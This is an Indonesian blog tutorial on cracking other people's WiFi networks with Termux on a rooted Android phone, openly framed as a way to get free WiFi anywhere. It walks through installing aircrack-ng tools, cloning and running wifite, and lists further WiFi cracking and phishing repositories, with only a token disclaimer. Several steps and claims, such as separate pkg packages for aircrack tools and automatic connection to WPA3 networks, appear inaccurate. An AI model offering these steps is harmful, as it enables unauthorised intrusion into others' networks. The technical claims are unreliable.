Lompat ke konten Lompat ke sidebar Lompat ke footer

Cara Bobol WiFi dengan Termux di HP Android

Cara Bobol WiFi dengan Termux di HP Android

 Di artikel ini kamu akan diajarkan cara bobol WiFi dengan Termux di HP Android agar kamu bisa WiFi-an secara gratis di tempat manapun yang menyediakannya, tak peduli jaringan WiFi tersebut menggunakan password ataupun tidak, yang jelas dengan cara ini kamu akan berhasil tersambung jika menyimaknya dengan benar.

Koneksi WiFi sekarang sudah tersebar luas dimana-mana, hampir setiap rumah maupun tempat umum sudah menggunakannya untuk bisa mengakses internet dan online di dunia maya. Kadang saat mendeteksi adanya WiFi, kita sangat ingin menggunakannya apalagi di kondisi sedang tidak memiliki kuota internet.

Namun tanpa mengetahui cara bobol WiFi, kamu tidak bisa sembarangan menggunakan WiFi tersebut karena biasanya jaringan WiFi diamankan menggunakan password atau kata sandi untuk menghindari akses yang tidak diinginkan yang mungkin dianggap akan merugikan.

Meskipun begitu, bukan berarti WiFi tersebut dikatakan 100% aman dan sepenuhnya terhindari dari pembobolan. Saat ini sudah banyak metode untuk membobol jaringan WiFi dan diantaranya adalah dengan menggunakan aplikasi Termux, yang mana bekal kamu untuk melakukannya hanyalah lewat HP Android saja.

Dan di Termux, metode yang digunakan terbagi lagi, ini tergantung pada script yang kamu gunakan. Admin menemukan satu script Termux untuk bobol sandi WiFi yang lumayan ampuh dan works, kamu juga dapat menggunakannya untuk di WiFi IndiHome, ZTE, dan penyedia jaringan WiFi lainnya dengan keamanan apa saja termasuk WPA2, WPA3, WPS, dan WPA-PSK.

Baca Juga: Cara Hack CCTV Lewat Termux 2022

Kelebihan lainnya, serangan yang dilakukan oleh script ini dilakukan secara otomatis, jadi kamu cukup menjalankannya dan menunggu tersambung. Tapi ada satu hal yang sangat disayangkan, script hack WiFi ini membutuhkan akses root pada HP Android kamu.

Nah, untuk kamu yang HP Android-nya memenuhi syarat, yaitu sudah di root, kamu bisa lanjut melihat tutorial bobol WiFi menggunakan aplikasi Termux berikut ini. Sedangkan untuk kamu yang tidak memiliki akses root, mau tidak mau kamu harus root terlebih dahulu Android kamu.

Cara Bobol WiFi dengan Termux di HP Android

Penafian:

Membobol atau meretas jaringan WiFi tanpa sepengetahuan pemiliknya adalah tindakan yang ilegal dan tidak sah. Meskipun disini Admin membagikan tutorial membobol WiFi, namun Admin tidak mendorong kalian untuk melakukan hal tersebut. Manfaatkan cara ini untuk hal positif seperti membobol password WiFi sendiri atau milik tetangga jika kamu sudah meminta izin dan diizinkan. Untuk tanggung jawab dari penyalahgunaan diterima oleh masing-masing.

1. Langkah paling awal adalah Install aplikasi Termux di Android kalian terlebih dahulu.

2. Setelah sudah, buka aplikasi tersebut dan tunggu proses installing awal sampai selesai. Tiap pengguna baru pasti akan mengalami proses installing ini.

3. Jika sudah masuk ke aplikasinya, install module beserta package yang dibutuhkan dengan cara menjalankan semua perintah di bawah ini satu-persatu. Ingat, install satu-persatu, jangan langsung semuanya.

$ pkg update

$ pkg upgrade

$ pkg install git

$ pkg install clang

$ pkg install proot

$ pkg install python python2

$ pkg install airmon-ng

$ pkg install airodump-ng

$ pkg install aireplay-ng

$ pkg install packetforge-ng

$ pkg install aircrack-ng

$ pkg install tsudo

$ pkg install tsu

$ tsu (untuk berjalan sebagai root)

4. Langkah selanjutnya install script WiFi ke Termux, masuk ke folder, dan mengganti hak aksesnya dengan perintah:

$ git clone https://github.com/derv82/wifite

$ cd wifite

$ chmod +x wifite.py

5. Sekarang hidupkan terlebih dahulu koneksi WiFi di HP kamu.

6. Setelah itu, di Termux, eksekusi perintah berikut ini untuk menjalankan script:

$ python2 wifite.py

Script akan otomatis menghubungkan kamu dengan jaringan WiFi target yang berada di sekitar.

7. Selesai.

Kamu akan tersambung namun tak akan tahu password WiFi-nya. Jika memang ingin mengetahuinya, caranya lain lagi, kamu bisa melihat cara mengetahui password WiFi yang sudah tersambung.

Jika cara bobol WiFi Termux menggunakan script di atas tidak berhasil, pasti ada yang salah dari cara kamu menginstall scriptnya. Silahkan ulangi lagi dan pastikan setiap huruf dari perintah yang dijalankan sudah benar. Masih tidak berhasil juga? Berikut ini ada beberapa daftar script Termux bobol WiFi lainnya yang bisa kamu coba:

  1. git clone https://github.com/esc0rtd3w/wifi-hacker
  2. git clone https://github.com/kumpulanremaja/wifi
  3. git clone https://github.com/aircrack-ng/aircrack-ng.git
  4. git clone https://github.com/wifiphiser/wifiphiser.git
  5. git clone https://www.github.com/threat9/routersploit
  6. git clone https://github.com/Aijazmaker/WifiPhishing
  7. git clone https://github.com/Tcnopdtor/Tcnophish
  8. git clone https://github.com/derv82/wifite2 (Script ini sama dengan script yang kita bahas di atas namun sudah diperbarui).

Kebanyakan pengguna termux menggunakan beberapa script di atas untuk hack WiFi. Silahkan pilih salah satu script di atas kemudian kamu tinggal kloning saja ke aplikasi Termux masing-masing.

Baca Juga: Pengertian, Fungsi, Cara Install dan Menggunakan RedHawk di Termux Android

Untuk metode pembobolan serta cara menggunakannya berbeda-beda untuk tiap script. Jika ingin tahu lebih detail mengenai cara install dan menggunakannya, buka file README.md pada script tersebut dan kamu akan melihat keterangan lebih jelasnya.

Demikian pembahasan cukup detail dari cara bobol WiFi dengan Termux di HP Android yang pastinya mudah dipahami untuk pemula. Silahkan di coba dan semoga bermanfaat. Terimakasih.

Posting Komentar untuk "Cara Bobol WiFi dengan Termux di HP Android"